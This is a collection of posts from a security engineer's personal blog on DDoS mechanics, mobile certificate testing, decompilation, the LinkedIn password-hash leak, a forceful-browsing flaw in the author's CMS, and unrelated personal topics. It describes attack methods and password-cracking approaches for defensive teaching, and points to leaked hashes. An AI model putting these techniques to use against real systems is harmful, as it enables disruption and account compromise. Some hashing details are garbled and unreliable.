- Posted by
The recent wave of DDoS attacks on banking web sites, and the
Spamhaus DDoS attack (which was three to five times greater
than the biggest attacks against U.S. banks) is reinforcing that,
while the attacks aren't particularly sophisticated, they do
warrant our attention. If targeted the attacks can be extremely
disruptive to online operations. To protect against DDoS attacks,
it's important to understand their root cause.
DDoS's take many forms but at the core, they're essentially a
battle of resources. The attackers will attempt to exhaust
resources on the server through "reasonably" valid requests. I use
this term loosely because they will exploit certain assumptions
that the network or web server will make to tie up the maximum
resources per request. After that, it's just a matter of getting
enough additional manpower to do the same thing at once to clog up
the server's resources.
This differs from the
normal DoS (Denial of Service) in which the attacker finds a single
request that can consume massive amounts of resources or take down
One popular mechanism for DDoS attacks is the "SlowLoris" attack,
which is a piece of software written by Robert Hansen (RSnake).
Wikipedia does a great job of explaining it as such:
Slowloris tries to keep many connections to the target
web server open and hold them open as long as possible. It
accomplishes this by opening connections to the target web server
and sending a partial request. Periodically, it will send
subsequent HTTP headers, adding to-but never completing-the
request. Affected servers will keep these connections open, filling
their maximum concurrent connection pool, eventually denying
additional connection attempts from clients.
Another popular way to do this is to simply flood the server
with TCP packets (some that say you want to create a connection,
some that say that a connection is already going on, some that say
to close a connection that doesn't exist, etc.) The server is
forced to handle each of these TCP packets and determine how to
deal with them. Similar to the slowloris attack, the server will
try to hold on to the connection as long as possible if you try to
partially open the connection. For most popular web servers every
connection maps to a process on the server so you can exhaust the
Process ID space on the server if you're quick enough. There's a
tool that Anonymous made popular called the Low Orbit Ion
Cannon that make this easy.
Servers are inherently designed to handle a large number of
connections, so it's difficult for one individual to knock over a
server; however, with enough people or a botnet, it can be brought
to its knees. If it takes a server the same amount of time and
resources to create and send a request as is does to receive and
process the request then it is truly a battle of who has the most
resources. Taking down something like Amazon or Cloudflare is going
to be nearly impossible.
To help mitigate the risk of DDoS attacks, organizations should
consider moving their servers to an infrastructure that scales -
and scales fast. Amazon allows you to add virtual servers when a
potential DDoS attack is happening. Cloudflare tries to do this in
real time. Cloudflare, ironically, was the target of a few DDoS
attacks last year, which tried to saturate the network. The
attackers hit throughput of 90Gbps, which is an insane amount of
traffic. At that speed, assuming your computer could keep up you
could download six full length high definition movies in ONE
SECOND; or I could transfer the entire contents of my hard drive in
less than ONE MINUTE. Cloudfare recently wrote a couple of good
blog articles about how they handled the attacks:
Additionally, one of Security Innovation's Principal Security
Engineers, Marcus Hodges, wrote a library for python called BlackMamba, which makes it
easier to write a client to create a huge number of requests for
fast scanning or DDoS attack simulation. Note, it does require a
lot of hardware to conduct this simulation, but this library can
help level the playing field making it easier for you to write a
very fast, parallel asynchronous python script for testing.
Link to this article.
- Posted by
Yesterday was a sad day for NASA who were forced to halt all
education and public outreach activities including public
engagement out outreach events, programs, activities and products.
These spending cuts, enacted by congress through inaction will
directly affect the education, inspiration, prosperity and
competitiveness of our future generations of the USA (India and
China are both investing heavily in space exploration programs). We
just reduced our investment in space exploration from 1/2 of one
We need more education and more roll models for our kids like
our astronauts, scientists and educators and fewer who provide no
improvement to our society like our "reality" television and silly
celebrities. We need more funding for things that will improve our
society through education and inspiration and fewer things that
will tear it down like fear and war.
Neil deGrasse Tyson has some powerful words about this, please
watch the video below. It's heart wrenching and inspirational.
Here is the NASA Internal Memo:
If you want to build a ship, don't drum up people to collect
wood and don't assign them tasks and work, but rather teach them to
long for the endless immensity of the sea.
- Antoine de Saint-Exupery
Link to this article.
- Posted by
I'm happy to say that tonight I'll be publishing JoeCMS as a free and
open source (GPL), as evidenced by the little "Fork me on GitHub"
banner in the upper right corner of this page. JoeCMS runs this
website and a couple of others and I've been really happy with its
simplicity and feature set. I created JoeCMS after trying to
shoehorn a few of the bigger CMS's into my needs. They were all
complicated, had a ton of dependancies and most of all were
confusing for the users of my websites.
If you want to get started with the CMS head on over the the
github page or just dive into the quickstart guide
I feel it's really important that I could write the feature set
of Joe_CMS down on the back of a napkin. The primary features are,
and will always be:
- A Blog (everybody wants a blog, right?)
- Easy to create other pages (like a CMS)
- Change layout and skin online
That's about it. Sure, there are other supporting features, like
page versioning, Markdown support, the ability to mark pages as
hidden or draft, RSS, and some others, but the big thing is that if
you just want a website, and don't want all the other stuff that
often comes along with a CMS, JoeCMS may just work for you.
If you're a developer and want something to build on, this might
be a good solution for you too. There are some cool features
already done, and there's plenty to build on. Of course if you make
improvements please send a pull request over!
I'm proud to release JoeCMS, any feedback is greatly
Link to this article.
- Posted by
A couple weeks ago I presented a webcast
at Security Innovation that covered techniques for testing mobile
applications. As usual I was long winded with stories and analogies
and went over time. I tried to answer as many questions as
possible, but we had to cut the webcast off at ten minutes after
the hour. As I closed out the webcast I mentioned that there were
dozens of great questions that I wanted to answer, but didn't have
time for. There were tons of great questions and just like in the
webcast I have been thorough if a bit long winded. On the plus side
I plan on releasing answers to all of the questions asked, and
we'll release these in a multi-blog series.
I've copied the questions here and answered them as thoroughly
as possible. I appreciate your questions and strive to be the
fountain of knowledge that you expect, so I hope you'll keep them
coming for my next webcasts!
Zak Dehlawi, Security Innovation's resident Android Guru,
answered most of the Android questions. So when you see an answer
about android, it's his expertise we're tapping into. Thanks
One small note, I've taken each of these questions verbatim, but
dropped the names. The questions are yours, the answers are mine
Q: What do you think about SDLC? Do tools exist to do
A: I think integrating security into each phase of the SDLC
(Software Development LifeCycle) is a huge step forward to creating
secure applications. Getting the security conversation started
early and continuing it often is very important.
The Microsoft SDL (Secure Development Lifecycle also called the
SSDLC or Secure Software Development Lifecycle) and many others
define security "gates" between the phases of development, which
are also very helpful. You can think of these gates as checks and
balances between each phase. They help the business people talk to
their end users about security, help get those requests into
requirements and then translate those requirements into secure
specifications by the architect. At each transition there is
process in place to make sure things are done properly and
effectively. A gate for developers might be something like a
security code review before check-in. For testers it might be a
security test pass before sprint sign-off.
The SDLC is more of a process, so it doesn't lend itself to a
single tool particularly. However Microsoft has released SDL
templates for both Agile and waterfall processes that snap into
VSTS and TFS. They've also released the Microsoft Threat Modeling
Tool which can help kick your SDL off to a great start.
While you can use the MS SDL even if you're not a Microsoft shop
you may be looking for other standards. If you're interested in
those I'd suggest checking out the OpenSAMM (Open Software
Assurance Maturity Model) project, which is an OWASP subproject.
OpenSAMM does a great job of defining gates inside and outside of
the actual coding phases including touching on Governance,
Construction, Verification and Deployment phases. This is nice and
lightweight and covers a great deal of touch points for development
If you're still looking for something else check out CLASP
(Comprehensive, Lightweight Application Security Process)
Security Innovation offers SDLC Gap analysis as a service, which
is why I know so much about each of these things. When we perform a
Gap Analysis process for our customers we first look at their
current process, then discuss their goals for security. Once we
understand where they are and where they want to be we will help
create a roadmap using many of the principles in the MS SDL, the
CLASP and the OpenSAMM processes to custom tailor a solution that
matches our client better than any other standard could. We then
help highlight different security gates through internal and
external process, education, tooling and standards to make sure the
process is abided by properly. The gap analysis can take quite some
time as our clients become more mature in their process, so we
build in touch points over months or years with our customers as
they implement their secure process throughout.
If you have any further questions please contact me!
Q: Is buffer overflow possible for Android
A: Buffer overflow vulnerabilities in the classic sense are not
possible in managed code. Android apps are written in Java and
executed by the Dalvik Virtual Machine, which performs array bounds
checking, any attempts to exceed the array bounds result in
ArrayIndexOutOfBoundsException. However, as the Android OS is based
on Linux, a number of low level programs written in C/C++,
including the VM, could be vulnerable to buffer overflow
These classic vulnerabilities can be found in a number of
places, and aren't always patched as wireless carriers drop support
for their phones. In fact rooting your Android phone usually
involves either a buffer overflow attack or resource exhaustion
attack depending on the phone and OS version. Newer versions of the
Android OS have taken steps to mitigate these threats using Address
Space Layout Randomization (ASLR) and hardware based No Execute
(NX) to prevent code execution on the stack and heap.
Q: You mentioned that applications should check for
certificates component. How can we modify certificate parameter for
A: During the talk I mentioned that every certificate should be
validated on the device as much as possible. Depending on your
needs for flexibility and security you may choose validate the
certificate using the certificate's attributes and the certificate
chain of trust up to the CA root. If you are certain the
Certificate will not change then you can also hardcode the
fingerprint of the certificate into the application. This reduces
flexibility because if the certificate ever has to change for any
reason you'll have to send out an update to your application. On
the other hand it can help if you're concerned with Certificate
Authorities getting hacked and an attacker generating invalid
When we test the certificate checking on the device we will
first attempt to redirect traffic through Burp without generating
our own certificate. This will test the classic Man in the Middle
attack since the Portswigger CA is not trusted on the device by
default. This should fail every time. If it doesn't that means the
application isn't checking the certificate's CA chain or may only
be checking that they are communicating over SSL, not the
certificate at all.
If it passes that test then we install the Portswigger CA on the
device and try again. If this works then we know the application
does not have the fingerprint of the cert hard coded and it's
trusting the CA store on the device. If this doesn't work then we
have a bit more work to do and will investigate why the cert is
Next we will modify the certificate's attributes one by one.
Will the app accept a certificate that is expired? What about one
that is not yet valid? What about one which doesn't match the
common name? We will invalidate each attribute and check how the
Q: How many Security Departments are using Burp to
A: Many! There are other HTTP proxies out there (WebScarab,
Paros, Fiddler, etc.) that are all good, for different values of
good, but Burp seems to be the industry standard. Burp is
relatively inexpensive, easy to use and full featured. Sometimes
we've found it falls short for some high volume or very complex
tests, but it does a good enough job that I use it whenever I use a
proxy. For those highly complex or high volume tests we usually
develop our own tools in python. For the high volume tests we love
using one of our Principle Security Engineer's asynchronous python
library, Black Mamba; thanks Marcus!
Q: great presentation!
A: Thanks! Tune in next time!
Link to this article.
- Posted by
In November of last year engadget ran a story explaining how
easy it was to decompile Windows Phone 7 applications. A lot of
developers were surprised that their
apps could be reverse-engineered and decompiled and attackers
could easily browse the source of their applications. The attack
goes something like this: download ILSpy for Free, Sync
your Windows Phone 7 or download a Windows Phone 7 App to your
computer, open the app in the Reflector, right click and select
"decompile." Once the application has been decompiled Reflector
displays the application's source in the main window. There's even
an option to export the source as a Visual Studio Project. This
makes it easy to understand the algorithms used for key management,
licensing, or that sweet graphics engine they've developed. You can
leverage the same attack on Jar or Silverlight files you download
off the Internet, or any other application written in a language
that is built into some kind of IL of Byte-code.
Before you start polishing off your "C Programming Language" and
decree everything must be compiled to the bare metal or decide
you'll write your own obfuscated assembly… by hand… consider your
options and the benefits jumping through all these hoops will get
The common reactions to decompilation attacks are:
- Write it in a native language
- Design with openness in mind
I'll be talking about each of these in depth in this blog, but
here's a preview:
Native Languages, such as C/C++ are compiled to Machine Code,
which can be interpreted by the processor directly, without an
interpreter, however these can be decompiled too, there are some
amazing tools out there to help with this. Obfuscation can raise
the bar, however if the reward is great enough the attacker will
break the obfuscation, additionally the obfuscation may simply
frustrate your attacker, training them with laser-like focus on
your app. Understanding the threats early and designing with
openness and security in mind can help you move many of the threats
off the untrusted mobile device.
<disclaimer >I'm not a lawyer, so I'll stick to the
stuff I do know, application security, but if you're really
concerned about Intellectual Property and somebody stealing your
ideas I'd suggest you read up on Patent Law and some of the laws
around "Prior Art." </disclaimer>
Mobile Devices are simply another class of client. Developers
have been programming client applications since two computers were
networked together. One lesson we keep learning is don't trust
the client. Don't trust it for input validation, don't trust
it to create your SQL queries, don't trust it for authentication or
authorization, and don't trust it for anything that matters.
Clients have come in all kinds of different flavors over the years,
the web is the client-server paradigm that rules today, but 10
years ago the client server model was custom, everything had a
client we had to download and a port we had to open to enable the
functionality of the software. Neither of these models is
inherently more secure than the other.
Most of the apps I've seen on mobile devices do a great job of
letting me access my data that is already in the cloud, mashup two
or more sources of data for my mobile browsing pleasure or it
performs the bulk of the processing on the server due to processing
or data storage limitations on the handheld. If your app falls into
any of these categories, you've got little to worry about. Most the
neat stuff your app does is not on the device! Just keep innovating
and you'll stay consistently ahead.
Here are some examples of apps I used often:
- OneBusAway - Mashup/Server Processing
- Twitter - Cloud
- Yelp - Cloud
So what if your app really needs to protect something? Two apps
on my device immediately come to mind and fall into that category:
Rhapsody and Kindle. Both of these applications protect data using
Digital Rights Management (DRM) so protecting keys is … well, key.
We'll talk more about encryption and key management options
Let's talk about options:
Write it in a native language
One of the first things to come up in early discussions about
securing a client app is to write it in a language that will
compile into Machine Code. Machine Code is the lowest level
language to give instructions to the processor itself. It is highly
hardware dependent, making portability difficult and increases the
risk to other security vulnerabilities such as Buffer Overflows,
Format String Vulnerabilities and other Memory management issues.
Most of these issues are far worse than information disclosure or
decompilation attacks could ever be; they likely allow for
arbitrary code execution on the remote device.
Native code is more difficult to decompile, true, but with tools
like IDA pro it's
possible to disassemble native applications and sometimes possible
to reverse the binary back to readable C source code. Writing your
application in a native code language can help obfuscate the
original code and can make it more difficult for an attacker to
understand what the application is doing, however the risks
inherited by native code don't outweigh the protections provided by
modern languages like C# and Java.
Choosing a Native language over a managed language for security
purposes is like locking yourself in the Lion's cage at the zoo
because you're afraid of the mice.
Microsoft's official stance on releasing .net applications is to
obfuscate your application before release. Specifically with the
PreEmptive Solutions' Dotfuscator Microsoft says the following
about Dotfuscator on their
website "any .NET program where the source code is not bundled
with the application should be protected with Dotfuscator."
Obfuscating an application attempts to make reverse engineering
and decompilation more difficult, however these techniques can
range from producing difficult to read code after a decopile to
frustrating a focused attacker enough for them to wage a personal
vendetta against your application and code, vowing to untangle the
mess of obfuscated code if it takes dozens of RedBulls and weeks of
Basic obfuscation techniques include rewriting methods,
parameters and variables with small or meaningless strings.
Advanced obfuscation techniques attempt to actively exploit
techniques used by decompilers to get back to the original
When asked about obfuscation at conferences or in classes I
usually respond the same way: It can't hurt. Obfuscating your code
will raise the bar for who can decompile your code and reduce the
likelihood of an attacker being able to quickly and easily Trojan
your binaries. However, like most things, as a single line of
defense it is far from sufficient.
Design with Openness in Mind
Of course this entire blog has been one big lead-up to what I
really wanted to talk about: the security principle of Designing
with Openness in Mind. If we assume our attackers have access to
our source (and comments), bug tracking system, design documents
and architecture diagrams and we can still look each other in the
eye and say "this is a secure system" then we've gone a long way on
the path to complete security.
All cryptographic solutions are based with this in mind. If you
want to you can learn how AES, one of the most popular and secure
algorithms in the world, works.
Heck, there are even stick figure cartoons to help you
understand. At the end of the day understanding exactly how AES
works will not help you break the encryption, in fact understanding
it will help you make better decisions about how to use it
We're not all building crypto libraries, of course, but we can
apply this same principle to our code. By making the above
assumptions we're covering all our bases and making sure there
aren't any "keys to the castle" hidden in source code. By
understanding how easily an attacker and reverse engineer and
decompile our applications we're less likely to simply hope they
don't find our secrets; we will take steps to make sure they
Here are a few common examples of designing with security and
openness in mind up front:
Client-Server Authentication: I've seen more
than a few applications that need to authenticate a client to a
server without user interaction. The naïve way of accomplishing
this task is to simply embed the same set of credentials in each
binary and have the client send these up to the server for
authentication. Of course, if one set of credentials is
compromised, all clients must be updated. The next level is to
allow for some kind of registration phase and give each client
unique credentials. This increases security by limiting the damage
possible if one set of credentials are lost, but it can be very
challenging to protect credentials on the client or while in
transit. Finally using a valid Public Key Infrastructure system can
help design and build a secure system without compromising
security, speed or ease of development. Simply generating and
sharing X.509 (SSL) Certificates on the server can go a long way to
building a system that is resilient to tampering and sniffing
Plugin Extensibility: What if you want to be
able to extend your application with new plugins? Perhaps you want
these plugins to come from only a trusted source. So you want the
application to be able to validate the source of the DLL. One basic
way of doing this is as above, simply embed a super-secret string
in the DLL then ask the DLL for that secret when it's loaded, if
the secret matches, you're good to go, right? Wrong, it's trivial
to discover that secret and build it into a rogue library. Another
poor solution I've seen is to build a secret algorithm that will
process data in some specific way. For the sake of example let's
say the secret algorithm is "add 5, divide by 2 and round down."
Now in order to check the validity of the DLL I generate a number,
do the calculation myself, send the number to the DLL and check
what it returns. I generate 7 that means I'm looking for a 9
(floor((7+5)/2) = 9. If they match we know it's the right DLL,
right? Wrong again, just like the hidden secret issues above I can
discover your secret algorithm by decompiling or reverse
engineering your existing DLLs. Worst case I can just write a pass
through method that will ask your valid DLLs for the answer! Crypto
to the rescue again. We can sign each of our DLLs and binaries
before we ship. This will bind our DLLs to a trusted source
(anybody that has the private signing key) and allow the
application or system to cryptographically validate the DLLs
I don't mean to imply cryptography is the source of all security
solutions, these are simply two common examples that I've seen
cause problems for a lot of our clients. In the long term thinking
about threats with the assumption the attacker has access to your
inner workings can make for a significantly more secure system.
Attacks like reverse engineering and decompiation are the technical
side of the greater issue of secret hiding. People love talking
about their work especially the cunning algorithms they design,
you'd be amazed at what you can hear at a pub, a popular lunch stop
or just by asking.
As you design and architect your application go through each
component and ask yourself what data or algorithm needs to be
protected? What is the loose thread that is holding your
application together that, if discovered by an attacker, could lead
to the ultimate compromise of that application. Once these pieces
have been discovered decide whether that threat is something you
will mitigate or a risk that you are comfortable assuming according
to your internal policy.
Link to this article.
- Posted by
read a really well written article by Daniel J. Solove is a
professor of law at George Washington University who says we should
stop thinking about privacy in Orwellian terms (nothing to hide),
but in Kafkaesque terms (if we have enough information about you we
will be able to find something, eventually).
I think this is especially pertinent in this new age of
surveillance and data storage. It costs nearly nothing to store
information now, especially for large corporations and governments
so they have very little incentive to purge surveillance data. We
may not have the technology or time to link multiple disparate
pieces of information together now, but given enough time and data
a computer program (or a human with enough time on their hands)
could be written that would make inferences and assumptions about
the nature of someones actions or intent.
The other concerning thing is that there's no way to opt-out of
this surveillance, unless you want to spend the rest of your life
in a cabin in Montana (even then ultra-high resolution satellite
imagery and radar make surveillance possible). The data is
collected without consent every time we walk on the street or drive
a car (CCTV and license plate surveillance makes it possible to
track the path of an individual from home to work, software can
identify patterns and deviations from patterns and notify anybody
needed automatically when somebody passes a threshold.)
I didn't really mean to go off on a pro-privacy, conspiracy-nut
rant, but it's something that's been on my mind for a while and I'm
not entirely sure how to fix it. Education and awareness are
certainly key components, but it seems like so many people don't
care or allow themselves to be driven by fear that it's difficult
to see a solution sometimes.
the article Why Privacy Matters Even if You Have 'Nothing to
Link to this article.
- Posted by
By now, you've probably heard that LinkedIn's passwords have
been allegedly compromised. I first heard about this from a
Norwegian website earlier today. Here is what we know now:
- LinkedIn has not confirmed the leak and currently doesn't
understand how the hack could have happened, but there is a 271 MB
file of alleged SHA-1 hashes floating around with LinkedIn's name
- The hash digests are unsalted SHA-1 hashes.
Technical mumbo jumbo is to follow, if you're just worried about
your password you should simply change your password. Don't use any
website that offers to check if your password has been leaked by
typing your password into their website. These may be completely
legit, but they're probably trying to ride on your fear and steal
your password. You should also change your password on any other
site that you used that password on.
If you'd like to see the list of hashes for research purposes
you can download it
here (warning: 171 MB).
This is particularly interesting to for a number of reasons.
Right now I'm in Sofia, Bulgaria teaching a room full of developers
secure coding best practices and just yesterday we had talked about
proper handling of passwords and other sensitive data. We walked
through the spectrum of poor password handling practices:
Obviously, worst is on the left to best on the right.
To understand the risk let's walk through a quick rundown of
what hashing is and how LinkedIn is storing your passwords.
is a one-way mathematic function that can take any input and map it
to a smaller output (digest). The nice thing about hashing is that
if you use the same input you are guaranteed to get the same output
or digest. If the input changes, even in the slightest bit, your
digest will change drastically. Another nice thing about hashing is
that the digest doesn't give you any information about the input,
so it is not possible to reverse a hash.
We can use hashing algorithms to make it easier to safer to
store passwords. Instead of storing the plaintext password in the
database, which everybody agrees is bad, right? We can
store the digest of the password in the database. Then when you
type in your password I'll calculate the hash of what you typed in
and compare it with what I have on file for you. If they match then
you're in, if they don't I'll kick you out!
There are multiple ways, or algorithms, to "hash" text, some are
better than others, only "cryptographic" hash functions should be
used for anything security related, so I'll only talk about those
here. Again, we have a spectrum of worst to best (hint, if you're
thinking about using a hashing algorithm that isn't on this list...
MD5 <-> SHA-1 <-> SHA-256224 <->
The first two are broken and should not be used. Note, LinkedIn
used one of the broken ones.
Hopefully as you're reading this you're thinking "Joe! You said
earlier that if give only the output of a hash you can't get back
to the original text, so if LinkedIn was only storing the hash
digest of my password I should be safe, right!?"
Ah true! However, that's assuming I attack the hashes by trying
to break the hash algorithm directly. I've got a few quick
computers, and a bit of time. I also know a bit about how people
choose passwords, and how bad they are at it. So instead of trying
to break the hashing algorithm, I'm going to simply get a list of
every password I can get my hands on and calculate the output for
each one. I'll keep track of the password on the left and the
output I generate on the right. Next I'll simply lookup each digest
from the list in the massive table I just generated and get the
passwords from there.
This type of attack is called a lookup table, a more efficient
version that is slightly more difficult to explain is the Rainbow Table
attack and it theoretically will work for any password, it can take
a lot of work for really long and/or really random passwords
because there are so many combinations. This is why I mentioned
I'll just calculate the digests for the top passwords I already
know about. This way I don't have to do an exhaustive search.
OK, so now maybe you're getting nervous, because your password
of LvBieber isn't looking so great right now.
Since you used upper and lower case letters there are 52
combinations in each of the 8 locations above. That means there are
528 or 53,459,728,531,456 combinations. "Wow," you think
"that's a lot of combinations!" Slow down there, tiger. On my,
mostly, regular computer I can calculate about 680 million
possibilities per second. I can crack your password (and all the
other 52 trillion passwords in about 22 hours (Before lunch, if I
get a few friends to help).
What could LinkedIn have done to protect you from your own poor
password choice? Well, they could have required a Password Policy,
but everybody seems to hate those. They could have also added Salt. No, not
that salt, this Salt.
In software we call a chunk of random data that we add to
passwords "salt." Since your password is so easily guessable it's
likely it already exists in somebody's Rainbow table so the lookup
would be really quick and easy. We want to make them work for it.
So for each user I generate, say, 10 extra random characters to add
to each password. This means I generate some random characters
"7%bKeVm!fN" and add that to your password turning it into
LvBieber7%bKeVm!fN If I do this for every user the
hacker has to generate a rainbow table for each user independently.
Since I have to store the salt in plaintext along side your
password hash, since I'm the only one that knows it and I have to
use it to generate your digest to validate your password. Well
that's better than plaintext or just plain hashing, right? I bet we
can do better though, right? Of course we can.
There are a few key
derivation algorithms, PBKDF2, scrypt, and bcrypt, that add an
element of "work" to calculating a digest. The idea is that it's
not such a big deal for a website to spend half a second
calculating your password digest each time you login, but if an
attacker can only calculate two passwords per second that makes any
rainbow table attack infeasible. PBKDF2 does this by hashing the
output of the previous digest thousands of times, bcrypt and scrypt
use some fancy cryptography to do this a bit more elegantly, but
the result is about the same. Both bcrypt and PBKDF2 have been well
implemented in many languages.
One thing to note. Don't ever try to
implement your own cryptographic solutions. Never, ever, ever,
ever, should you attempt this. Cryptographers are smarter than you
and me and everybody I know put together. They spend all day
thinking about these things, and even then it takes a team years to
create new secure algorithms that is then peer reviewed and proven
to be secure. It does not happen with a clever insight after four
cups of coffee and an espresso.
Edit: A few comments and edits that my friends
at Reddit have pointed out. I suppose this turned into a bit more
of a technical article than I was originally intending, so I may
have skipped over a couple of things that I would have otherwise
- I should have mentioned explicitly that everything but PBKDF2,
bcrypt, and scrypt should be considered bad practice. Encoding is
no better than plaintext, at all. Encoding does not use keys and
does not provide security.
- When I say encrypted, I mean that you are trying to encrypt the
password such that it can be decrypted later, which is a bad
practice. We want a one-way function such that no date can ever be
recovered. Keys can be compromised, and there is no benefit to
using a reversible algorithm for passwords, it just increases your
- The reason why I consider encrypting a little bit
better than hashing is the massive popularity of rainbow tables and
hash databases available on the
internet. Poor passwords don't stand a chance against this if the
salt isn't used.
- I didn't (and don't) want to get into the specifics of how
PBKDF2, bcrypt and scrypt work, but they all increase the amount of
"work" a computer has to do to create the same hash digest. This
slows you you when verifying a user's password, but also slows the
attacker down from generating their tables which is good! Work can
be introduced purely by CPU usage, or in the case of scrypt memory
usage as well.
- All hashing algorithms will fail. Full Stop. Currently, if you
are designing a new system we recommend using SHA256 or greater. MD5 is
considered completely broken, SHA1
is considered well on its way out. If you have a system that
uses either MD5 or SHA1 consider making changes as soon as
Security Innovation, the company I work for, is hiring! If you
aren't completely and utterly excited about the job you currently
have come work for us. We have some of the best perks in the
industry and you'll be having as much fun as you've ever had at
To Apply send an e-mail to email@example.com
or try your hand at our challenge website at http://challenge.si.vc if you get
stuck on the challenge just send an e-mail to the e-mail address
above and we'll give you a hint. The challenge is supposed to be
fun, so have fun with it!
Discuss on Reddit
Link to this article.
- Posted by
I've been in the Security Industry for about ten years now. I
say that not to brag, but to give context for the rest of this
post. I've assessed countless pieces of software of nearly every
type, web apps, web services, desktop, firmware, mobile, Operating
Systems, and more. So believe me when I say this is a bit of a
tough post to write.
Up until about a month ago Joe_CMS had a major
security vulnerability in it.
But let me start at the beginning and tell the story in
chronological order. I've been working on a new CMS, one that would opt for simplicity and just the
right set of features so it's easy to use and very easy to
administer. Before I open source it, I wanted to deploy it to a few
of the sites that I run (Technically Learning, My Wife's Site, and this one).
I've been happily finding little bugs here and there and have
generally been happy with how it's shaping up. I even think a few
weeks ago I told a friend that it was "getting close."
A litte more than a month ago I browsed to my site to publish a
new blog post and noticed the Title of my blog had changed. I
thought that was very odd because it hadn't changed to something
recognizable, bur rather something like the random values that an
automated tool may inject to look for injection vulnerabilities. I
immediately suspected my coworkers and asked around. Nobody knew a
I checked over all the settings, that are configurable online,
the database strings were correct, the passwords were good,
everything seemed to be in order. I did think that since the site
doesn't go over SSL (something I intend to fix soon) that perhaps
my session or credentials were stolen and somebody changed the
settings manually. I changed all my passwords, added a longer
random registration code and decided to wait it out.
About a few weeks ago, it happened again! I again checked all
the settings, which had all been overwritten again, and immediately
started to think about how this could have happened. Did my hosting
provider get popped, my database, surely it's not my
Finally something dawned on me. I logged out and directly
browsed to http://whoisjoe.com/Settings.aspx. The page was wide
open. I had forgotten to require authentication on the Admin
Settings page!! I extended the asp.net BasePage as AdminPage to
require Authentication on any page as long as I remember to change
the inheritance. If you try to author a post, edit a page or modify
any template you have to log in. Somehow the settings page slipped
my mind and it was dangling out naked on the internet for who knows
how long. Luckily it looks like it was just bots and spiders that
found the issue, but had a real hacker discovered it things could
have been much, much worse.
This is exactly the kind of issue I look for and find in all
kinds of web applications. Forceful browsing is all over the place.
A developer assumes that because a page isn't linked to it isn't
accessible or won't be discovered, but in reality any page that
isn't explicitly protected is vulnerable. In addition to this
assumption one must also assume every vulnerability will found.
Every XSS, every SQLi, every CSRF issue will be found if given
enough time. This means that these cannot exist in your
application. I missed authentication on one page and if the wrong
person would have found it they could have easily compromised my
entire website making it a hotbed for malware drive by
Now that we've found the last bug in Joe_CMS I feel confident
it's ready to ship... right?
Link to this article.
- Posted by
Boeing's systems need to be capable of staving off hackers, and
for more than two years, the company has
employed two "hackers" to test the security of its computer
systems. I like it, but there's more that needs to be done.
Since most large organizations rely on a mix of COTS hardware,
3rd party software applications, communication technologies, and
custom code to run their IT infrastructure, it's difficult to apply
a single security assessment solution to ensure adequate coverage
and protection. If organizations want to better understand where
they are most vulnerable, they need to view their systems
holistically. This is, after all, how real-world hackers work -
there is no "in scope" or "out of scope" and they can target any
soft spot in the exterior.
Performing penetration tests and code reviews of selected
software applications is a great best practice for data security,
along with network penetration testing, but it tends to approach
security from the inside out and doesn't always follow chaining
paths between vulnerable systems. This makes it more difficult to
understand with certainty which hardware and software applications
are putting your organization at real risk of attack.
Organizations must secure thoroughly from within. This means
considering every avenue of attack and securing each layer and
component as well as possible. How do you do this? Internal (Red
Teams) and external penetration testing. Red teams are internal
resources that you deploy to attack an asset to determine if it's
vulnerable. When the development team thinks all risks and threats
have been mitigated, it's time to bring on the Red Team. The Red
Team's job should be to find any way into the system possible.
Put another way, think of it as product competition. Take the
mobile phone industry for example: it is up to each phone developer
to create the best feature sets and the usability possible, but
it's not impossible for the competition to think up something
completely new, change the game and win. Each company must at once
think of the current competitive landscape and imagine how the game
may change completely if a competitor hits on "the next big thing."
Before the iPhone everybody was competing on the same features and
the same understanding of usability. It wasn't until Apple ushered
in this renaissance of the smartphone era that we could jar
something as beautiful and usable as the Windows Phone 7.
In that way the development and test teams need to use every
tool at their disposal (both manual and automated) to find and
remediate every risk they can. Research all the current threats,
attack types, etc, but never lose sight of thinking about the next
thing that will utterly change the landscape of security regarding
My final thoughts:
Link to this article.
- Boeing is a company of about 165,000 employees, with thousands
of computer systems, tons of sensitive information, government and
flight data that hackers would love to get their hands on. All this
and they have two college kids securing their stuff? They need
dozens more, whether they are internal or external.
- The article quotes "Sims, 25, and Tam, 24, spend much of their
days devising, revising and analyzing complicated security programs
that they then attempt to crack." These two guys are in charge of
building AND breaking security systems. This doesn't work (at least
not well). I design a system to be resilient against the threats I
know about - so by definition I cannot break it.
- It's critical to get independent, expert eyes into the mix.
They have no conflict of interest and come in with a larger arsenal
of attacks and a fresh mind to assess the system
- The best (and often only) way to understand how an attacker
views your IT systems/infrastructure and takes advantage of
insecurities is to do the same. Too few organizations employ this
approach, which we feel is so integral to data security that we
created a program to serve this specific need.
- Posted by
I don't read a lot, but over the last few years I've developed a
book choice cycle that works really well for me. It helps me finish
challenging books that I want to read for development, and entices
me to be selective about the "fun" books I burn through. My reading
cycle is: one "fun" book, one personal development book and one
professional development book.
My first book can be something fun. I just finished
The Hunger Games trilogy, which classified as fun books. They
were so quick to read, I counted all three as one fun book
(probably strictly cheating) These are great as a mental vacation,
they're easy to read, and I don't expect to gain much more than
entertainment from them.
The next book is a personal development book. The last book I
read in this category was
How to Practice: The Way to a Meaningful Life by the Dalai
Lama. I've been on a bit of a buddhism kick lately, and this
was a wonderful book to read. The key concepts of mindfulness,
managing expectations and general happiness are great things to
think about regularly. Right now I've decided
George Orwell's 1984 counts as a personal development book,
because after The Hunger Games I needed something with a bit more
philosophy and direct commentary to it.
The third book in the cycle is a professional development book.
The Trusted Advisor or a technical book that will teach me a
new skill or polish an existing one counts here. I found that
sometimes, if I'm not careful, these books can linger in my bag,
unfinished, which is why I keep the "fun" book close by to trick
myself into finishing this one so I can eat my dessert.
Of course, every person will think differently about why they
read, how they read and what they hope to get out of their books.
For me this cycle works really well. I love reading books out of
each category and I like the variety of the different
Link to this article.